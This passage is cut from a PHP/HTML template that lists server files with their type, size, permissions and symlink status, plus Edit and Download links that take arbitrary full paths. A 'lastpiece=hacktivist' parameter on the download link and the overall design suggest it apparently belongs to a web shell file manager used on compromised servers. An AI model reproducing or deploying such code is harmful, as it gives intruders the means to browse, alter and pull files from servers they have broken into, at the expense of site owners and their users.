t:void(0)" onclick="showEditModal('<?php echo htmlspecialchars(addslashes($fullPath)); ?>')" style="color: #e6edf3;"><?php echo htmlspecialchars($fd['name']); ?></a>
                    <?php endif; ?>
                </span>
            </td>
            <td style="color: <?php echo $isSymlink ? '#a78bfa' : '#00d4ff'; ?>;"><?php echo $isSymlink ? 'Symlink' : $fd['type']; ?></td>
            <td><?php echo $fd['size']; ?></td>
            <td style="color: <?php echo $fd['perm_color']; ?>; font-family: monospace; font-weight: 600;"><?php echo $fd['permission']; ?></td>
            <td>
                <div class="action-btns">
                    <?php if ($fd['type'] === 'File'): ?>
                    <a href="javascript:void(0)" onclick="showEditModal('<?php echo htmlspecialchars(addslashes($fullPath)); ?>')">Edit</a>
                    <a href="?dl=<?php echo urlencode($fullPath); ?>&lastpiece=hacktivist" title="Download">DL</a>
                    <?php endif; ?>
                